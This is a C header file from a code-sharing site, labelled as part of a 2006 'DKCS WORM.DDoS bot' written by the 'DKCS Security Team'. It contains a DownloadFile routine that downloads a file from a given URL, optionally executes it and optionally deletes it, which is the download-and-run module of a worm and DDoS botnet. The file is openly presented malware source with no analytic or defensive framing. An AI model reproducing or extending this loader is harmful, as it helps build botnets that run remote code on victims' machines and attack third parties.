download.h
来自「dkcs_ddos_bot, written on VC++ 7.10 wit」· C头文件 代码 · 共 32 行
H
32 行
//-----------------------------------------------------------------
// this file is a part of: DKCS WORM.DDoS bot v 0.1
// c0d3d by: Dr.Pixel
// 2006 (C) DKCS Security Team
//
// contacts: e-mail: dkcs@void.ru
// icq: 7600278
// web: http://dkcs.void.ru
// forum: http://dkcs.net.ru
//-----------------------------------------------------------------
struct DOWNLOAD_INFO{
char *from;
char *to;
BOOL exec;
BOOL del;
};
//-----------------------------------------------------------------
DWORD WINAPI DownloadFile(LPVOID param){
DOWNLOAD_INFO file;
file = *((DOWNLOAD_INFO*)param);
URLDownloadToFile(NULL, file.from, file.to, 0, NULL);
if(file.exec){
ShellExecute(GetDesktopWindow(),"open", file.to, NULL, NULL, SW_SHOW);
}
if(file.del){
DeleteFile(file.to);
}
return 1;
}
//-----------------------------------------------------------------
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?